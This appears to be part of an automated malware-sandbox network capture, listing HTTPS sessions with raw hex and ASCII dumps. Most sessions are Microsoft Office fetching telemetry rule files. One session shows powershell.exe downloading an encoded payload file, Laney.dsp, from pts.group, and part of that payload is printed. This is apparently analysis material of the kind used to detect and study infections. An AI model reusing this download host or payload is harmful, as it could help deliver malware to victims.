                                                                                                              2024-12-05 09:38:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              19192.168.2.64974513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:21 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:21 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:21 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 464
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                              ETag: "0x8DC582B97FB6C3C"
                                                                                                              x-ms-request-id: 431871c3-501e-0047-55cc-45ce6c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093821Z-1746fd949bdjrnwqhC1EWRpg2800000002m0000000003twv
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:21 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              20192.168.2.64974413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:21 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:21 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:21 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 477
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                              ETag: "0x8DC582BB8CEAC16"
                                                                                                              x-ms-request-id: de914170-201e-0000-68ad-45a537000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093821Z-1746fd949bdzd2qvhC1EWRcygw00000002bg0000000010cx
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:21 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              21192.168.2.64974868.66.226.1164437352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:22 UTC165OUTGET /ab/Laney.dsp HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                              Host: pts.group
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-05 09:38:23 UTC530INHTTP/1.1 200 OK
                                                                                                              Connection: close
                                                                                                              content-type: application/octet-stream
                                                                                                              last-modified: Thu, 05 Dec 2024 00:23:29 GMT
                                                                                                              accept-ranges: bytes
                                                                                                              content-length: 440292
                                                                                                              date: Thu, 05 Dec 2024 09:38:22 GMT
                                                                                                              server: LiteSpeed
                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                              x-content-type-options: nosniff
                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                              2024-12-05 09:38:23 UTC16384INData Raw: 36 77 4a 6f 5a 6e 45 42 6d 37 76 59 39 77 6b 41 36 77 4c 55 6a 4f 73 43 50 6b 55 44 58 43 51 45 63 51 47 62 63 51 47 62 75 62 6b 44 59 6f 72 72 41 6c 4e 49 36 77 49 4b 74 49 48 78 75 50 56 76 35 58 45 42 6d 33 45 42 6d 34 48 42 2f 77 6e 79 6b 4f 73 43 6f 6c 64 78 41 5a 74 78 41 5a 74 78 41 5a 75 36 4d 67 57 42 57 65 73 43 53 37 66 72 41 70 53 4d 63 51 47 62 36 77 49 4f 34 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4c 72 41 67 39 45 63 51 47 62 67 38 45 45 36 77 4c 69 76 4f 73 43 45 46 43 42 2b 65 67 61 2f 77 4e 38 7a 4f 73 43 6a 4d 44 72 41 74 2b 79 69 30 51 6b 42 4f 73 43 74 57 50 72 41 6c 31 35 69 63 4e 78 41 5a 76 72 41 73 43 34 67 63 4f 69 38 32 63 41 36 77 49 4c 57 58 45 42 6d 37 6f 62 6c 6f 50 4e 36 77 49 58 41 6e 45
                                                                                                              Data Ascii: 6wJoZnEBm7vY9wkA6wLUjOsCPkUDXCQEcQGbcQGbubkDYorrAlNI6wIKtIHxuPVv5XEBm3EBm4HB/wnykOsColdxAZtxAZtxAZu6MgWBWesCS7frApSMcQGb6wIO4zHKcQGbcQGbiRQLcQGbcQGb0eLrAg9EcQGbg8EE6wLivOsCEFCB+ega/wN8zOsCjMDrAt+yi0QkBOsCtWPrAl15icNxAZvrAsC4gcOi82cA6wILWXEBm7obloPN6wIXAnE
                                                                                                              2024-12-05 09:38:23 UTC16384INData Raw: 58 52 45 6f 74 61 6b 32 42 48 53 76 33 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                              Data Ascii: XREotak2BHSv3wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                              2024-12-05 09:38:23 UTC16384INData Raw: 57 4f 6e 58 6a 4d 56 65 74 78 62 2b 78 4e 72 30 57 4b 71 34 50 39 4a 65 72 77 36 6a 32 48 6b 6c 4d 31 61 67 64 4a 64 43 78 59 62 61 39 55 33 56 43 2f 53 30 6d 41 36 65 43 53 74 4c 2b 51 55 54 68 55 56 4a 4d 44 62 54 70 34 67 49 4c 59 61 36 48 62 68 63 54 41 45 6f 77 79 2f 4b 56 30 32 64 4b 37 51 53 31 71 43 38 65 62 66 33 75 58 6d 33 38 46 36 70 62 4b 52 6b 54 62 6b 50 50 33 4d 4b 37 37 33 31 65 65 32 65 75 47 65 30 53 53 68 34 37 71 71 49 46 75 6e 45 66 79 6a 4d 64 4d 34 38 41 33 59 43 39 46 36 6b 68 42 52 2b 45 39 70 75 70 58 6e 66 76 77 4c 66 4e 7a 76 43 74 4b 59 47 2f 65 61 59 74 49 6b 5a 32 38 44 55 52 4f 38 6b 6f 4e 35 33 51 71 2f 66 51 48 57 76 33 30 42 31 72 39 39 41 43 55 6b 54 6a 75 70 65 4e 75 66 75 6e 58 6e 61 64 38 52 67 76 6d 68 6f 4c 39 6f
                                                                                                              Data Ascii: WOnXjMVetxb+xNr0WKq4P9Jerw6j2HklM1agdJdCxYba9U3VC/S0mA6eCStL+QUThUVJMDbTp4gILYa6HbhcTAEowy/KV02dK7QS1qC8ebf3uXm38F6pbKRkTbkPP3MK7731ee2euGe0SSh47qqIFunEfyjMdM48A3YC9F6khBR+E9pupXnfvwLfNzvCtKYG/eaYtIkZ28DURO8koN53Qq/fQHWv30B1r99ACUkTjupeNufunXnad8RgvmhoL9o
                                                                                                              2024-12-05 09:38:23 UTC16384INData Raw: 74 5a 61 39 6f 47 6c 34 6b 49 71 66 55 4d 55 42 72 74 39 41 6e 56 38 34 51 48 57 67 33 68 31 31 72 39 39 41 64 61 2f 66 51 48 57 76 33 30 41 6a 4f 75 37 32 4d 59 66 45 45 52 49 7a 64 39 65 31 6e 52 30 6f 65 36 33 49 44 69 51 57 73 69 38 4e 75 56 36 78 65 4f 52 58 30 76 52 65 76 32 57 46 4b 34 7a 63 2f 45 7a 57 53 2b 6a 4a 57 72 67 46 6f 36 42 51 58 55 71 55 75 43 42 58 76 74 79 6d 46 6e 6f 61 73 69 78 62 76 53 36 58 42 68 6d 35 65 62 6c 4e 7a 45 43 50 75 53 62 6c 62 56 35 4b 59 39 77 65 61 4e 46 44 4b 5a 4e 54 58 6e 52 52 6e 5a 48 64 38 53 37 72 5a 4b 50 52 4a 67 6f 6d 46 46 6b 54 38 36 31 65 73 34 4e 53 57 53 54 30 58 45 32 36 6b 67 68 65 73 37 38 6b 77 75 37 30 52 43 39 32 6a 38 42 57 65 78 4a 39 52 71 51 41 2f 48 54 4f 5a 70 47 6f 75 71 62 79 4f 57 43
                                                                                                              Data Ascii: tZa9oGl4kIqfUMUBrt9AnV84QHWg3h11r99Ada/fQHWv30AjOu72MYfEERIzd9e1nR0oe63IDiQWsi8NuV6xeORX0vRev2WFK4zc/EzWS+jJWrgFo6BQXUqUuCBXvtymFnoasixbvS6XBhm5eblNzECPuSblbV5KY9weaNFDKZNTXnRRnZHd8S7rZKPRJgomFFkT861es4NSWST0XE26kghes78kwu70RC92j8BWexJ9RqQA/HTOZpGouqbyOWC
                                                                                                              2024-12-05 09:38:23 UTC16384INData Raw: 72 39 39 41 64 61 2f 66 51 48 57 76 74 6d 47 6d 30 70 72 6a 36 57 58 4b 74 43 5a 32 4f 77 7a 75 45 43 57 77 39 46 6e 6c 44 55 73 54 69 50 39 45 34 58 4b 54 39 46 67 69 79 68 50 4b 58 72 65 65 77 52 6f 37 39 46 6a 55 55 6d 62 64 58 6f 65 68 35 7a 30 41 4a 6a 4e 57 6f 33 53 55 51 6e 6d 75 32 73 54 59 77 59 51 37 6b 71 2b 78 77 57 78 74 2f 68 6e 4b 49 78 6e 43 57 38 72 67 76 45 37 74 37 4e 63 63 58 53 73 6a 4a 6b 78 32 68 48 69 43 38 42 50 35 69 6d 55 75 6d 2b 32 6b 4c 71 6e 31 45 58 72 35 6c 76 4e 51 62 31 61 78 58 6f 5a 46 47 32 68 65 4a 78 55 56 72 33 65 76 58 71 6f 6d 68 56 6c 64 39 46 33 70 34 54 41 38 58 72 4b 66 51 77 52 4a 39 47 32 4b 4f 47 67 6f 69 64 7a 38 53 64 5a 57 36 43 73 66 4f 6c 4a 56 58 4b 6b 37 53 4f 76 64 55 63 73 59 63 72 4e 31 6f 6d 70
                                                                                                              Data Ascii: r99Ada/fQHWvtmGm0prj6WXKtCZ2OwzuECWw9FnlDUsTiP9E4XKT9FgiyhPKXreewRo79FjUUmbdXoeh5z0AJjNWo3SUQnmu2sTYwYQ7kq+xwWxt/hnKIxnCW8rgvE7t7NccXSsjJkx2hHiC8BP5imUum+2kLqn1EXr5lvNQb1axXoZFG2heJxUVr3evXqomhVld9F3p4TA8XrKfQwRJ9G2KOGgoidz8SdZW6CsfOlJVXKk7SOvdUcsYcrN1omp
                                                                                                              2024-12-05 09:38:23 UTC16384INData Raw: 72 38 42 50 77 55 65 65 76 2f 6a 31 33 55 42 31 32 69 6a 45 76 75 35 65 50 51 46 78 2b 45 42 31 6f 46 74 74 70 31 41 67 68 33 53 2f 4a 4a 67 54 4c 76 5a 51 39 65 47 64 4a 6b 78 74 58 6e 46 4c 37 39 51 42 38 58 78 65 63 51 62 39 48 6e 37 38 45 76 31 43 64 61 2b 4e 2b 72 54 2b 4c 6a 62 30 56 52 68 41 64 61 2f 51 78 50 6b 34 33 45 41 76 45 42 6c 4a 33 47 42 65 72 2b 35 75 76 4f 72 30 57 47 43 6e 37 64 56 65 68 77 58 2f 2f 65 44 77 62 74 36 35 2f 68 4c 39 51 6e 57 76 58 6a 30 46 30 79 70 41 64 61 42 62 6d 65 32 73 33 79 61 43 62 6f 51 6f 73 71 36 4a 4a 6a 74 59 75 63 57 76 4c 75 36 2b 39 34 64 75 75 50 53 65 56 43 62 37 6e 6c 35 70 37 71 34 37 48 50 77 61 48 30 46 31 72 79 6d 45 56 68 48 4a 72 4d 55 71 58 6f 62 79 51 45 56 37 39 46 6d 7a 62 5a 49 63 57 6f 6e
                                                                                                              Data Ascii: r8BPwUeev/j13UB12ijEvu5ePQFx+EB1oFttp1Agh3S/JJgTLvZQ9eGdJkxtXnFL79QB8XxecQb9Hn78Ev1Cda+N+rT+Ljb0VRhAda/QxPk43EAvEBlJ3GBer+5uvOr0WGCn7dVehwX//eDwbt65/hL9QnWvXj0F0ypAdaBbme2s3yaCboQosq6JJjtYucWvLu6+94duuPSeVCb7nl5p7q47HPwaH0F1rymEVhHJrMUqXobyQEV79FmzbZIcWon
                                                                                                              2024-12-05 09:38:23 UTC16384INData Raw: 66 2b 54 56 43 4b 33 66 51 41 71 67 58 72 74 30 68 52 67 51 39 69 70 44 51 48 57 76 33 73 57 76 72 67 67 4a 38 58 30 59 78 61 79 75 33 30 41 70 75 6f 75 4a 39 56 58 47 77 63 42 32 33 6b 42 31 47 62 54 34 2b 63 6e 6d 6d 66 46 41 58 76 57 73 72 74 39 41 6d 34 2b 62 70 2f 51 61 42 6b 46 31 72 39 73 65 33 51 31 62 74 45 34 69 42 6b 46 31 72 39 44 46 49 46 41 67 76 2f 51 53 51 30 42 31 72 37 2b 71 64 61 2f 51 7a 34 4e 52 49 4c 2b 79 4b 71 56 43 64 61 39 73 2f 38 67 75 75 58 6d 6d 4c 6d 6f 36 64 36 2f 66 63 74 4e 65 73 38 48 41 31 64 31 41 64 63 75 65 6b 2b 45 72 48 63 48 59 31 64 31 41 64 55 71 48 33 77 7a 4a 57 6f 68 4f 45 71 56 43 64 61 2f 51 7a 4d 39 52 49 4c 39 4e 51 56 62 31 42 4b 33 66 51 45 31 32 59 59 35 75 56 2b 4f 33 74 2b 63 59 4f 6e 63 75 4b 64 48
                                                                                                              Data Ascii: f+TVCK3fQAqgXrt0hRgQ9ipDQHWv3sWvrggJ8X0Yxayu30ApuouJ9VXGwcB23kB1GbT4+cnmmfFAXvWsrt9Am4+bp/QaBkF1r9se3Q1btE4iBkF1r9DFIFAgv/QSQ0B1r7+qda/Qz4NRIL+yKqVCda9s/8guuXmmLmo6d6/fctNes8HA1d1Adcuek+ErHcHY1d1AdUqH3wzJWohOEqVCda/QzM9RIL9NQVb1BK3fQE12YY5uV+O3t+cYOncuKdH
                                                                                                              2024-12-05 09:38:23 UTC16384INData Raw: 4a 68 77 54 2f 6a 4a 61 51 58 57 76 4e 33 5a 58 72 39 38 52 7a 45 72 32 45 30 4d 75 4c 6d 46 46 6f 33 66 42 68 42 4c 76 77 64 55 75 4c 72 2b 35 48 5a 7a 42 6e 4e 2f 4e 4c 41 67 6d 35 6a 66 56 2f 6b 70 47 34 4f 52 4b 71 30 48 6c 63 6e 34 54 6c 71 51 6a 6a 77 34 61 6e 45 71 79 6a 57 31 4e 68 5a 4f 41 4b 51 66 59 42 48 55 64 55 50 79 49 6e 35 38 43 35 66 4d 49 47 66 77 71 54 45 46 31 72 31 61 59 49 68 41 48 53 43 4e 52 58 72 63 57 2f 4f 77 6b 39 46 67 2f 41 57 33 2b 58 71 2f 65 52 4b 43 6c 39 47 69 6c 57 58 61 31 56 6b 39 53 43 73 68 78 56 72 47 6e 39 74 4b 78 41 6b 44 48 7a 54 2f 31 2f 4f 68 52 4e 31 5a 72 72 45 4c 53 36 78 61 4a 4e 7a 45 65 41 69 37 79 4c 61 61 54 66 46 64 37 4b 76 2b 50 2b 47 73 45 4d 4f 4e 41 51 6a 6d 71 4e 71 72 53 38 34 2b 77 69 4e 7a
                                                                                                              Data Ascii: JhwT/jJaQXWvN3ZXr98RzEr2E0MuLmFFo3fBhBLvwdUuLr+5HZzBnN/NLAgm5jfV/kpG4ORKq0Hlcn4TlqQjjw4anEqyjW1NhZOAKQfYBHUdUPyIn58C5fMIGfwqTEF1r1aYIhAHSCNRXrcW/Owk9Fg/AW3+Xq/eRKCl9GilWXa1Vk9SCshxVrGn9tKxAkDHzT/1/OhRN1ZrrELS6xaJNzEeAi7yLaaTfFd7Kv+P+GsEMONAQjmqNqrS84+wiNz
                                                                                                              2024-12-05 09:38:23 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                              2024-12-05 09:38:23 UTC16384INData Raw: 32 53 2b 62 39 47 36 79 72 54 56 44 58 6f 45 58 67 52 42 33 2f 4c 62 77 44 62 70 4c 6e 62 64 69 47 44 50 7a 39 4b 48 42 4b 33 79 6e 37 6c 34 34 45 34 30 6e 49 4c 59 55 79 72 33 69 50 70 58 2f 31 79 73 5a 75 56 77 65 2f 68 74 78 6d 59 6c 4c 35 69 55 6c 58 6f 65 58 4a 6a 66 69 57 51 4b 67 36 77 46 73 41 6a 2f 48 59 65 69 56 59 44 79 2b 4e 68 52 5a 32 30 6d 68 63 31 30 70 46 68 48 4b 48 39 42 42 61 7a 72 66 51 48 57 76 33 30 42 31 72 39 39 41 64 66 35 4c 43 4d 79 78 2f 6f 41 2b 43 43 57 4d 66 6b 6b 79 53 74 6d 4b 56 59 4f 70 72 43 6f 37 6b 4a 4f 79 59 48 62 77 76 74 65 67 37 73 53 76 6b 62 6c 4c 31 4c 52 53 53 66 63 45 64 4f 57 6b 4a 78 56 46 4e 4d 5a 31 58 72 4a 33 76 2f 78 38 39 47 32 33 33 42 71 32 69 4e 7a 38 53 4e 35 58 36 4d 6c 61 75 67 75 6c 5a 74 59
                                                                                                              Data Ascii: 2S+b9G6yrTVDXoEXgRB3/LbwDbpLnbdiGDPz9KHBK3yn7l44E40nILYUyr3iPpX/1ysZuVwe/htxmYlL5iUlXoeXJjfiWQKg6wFsAj/HYeiVYDy+NhRZ20mhc10pFhHKH9BBazrfQHWv30B1r99Adf5LCMyx/oA+CCWMfkkyStmKVYOprCo7kJOyYHbwvteg7sSvkblL1LRSSfcEdOWkJxVFNMZ1XrJ3v/x89G233Bq2iNz8SN5X6MlaugulZtY


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              22192.168.2.64974713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:22 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:23 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:22 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 494
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                              ETag: "0x8DC582BB7010D66"
                                                                                                              x-ms-request-id: 9b0204ab-501e-0047-62c1-45ce6c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093822Z-1746fd949bdfg4slhC1EWR34t000000002e0000000002d3e
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:23 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              23192.168.2.64974913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:23 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:23 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:23 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 419
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                              ETag: "0x8DC582B9748630E"
                                                                                                              x-ms-request-id: 1b86d58a-f01e-0071-54ce-45431c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093823Z-1746fd949bdl6zq5hC1EWRf3ws000000026g000000003wxe
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
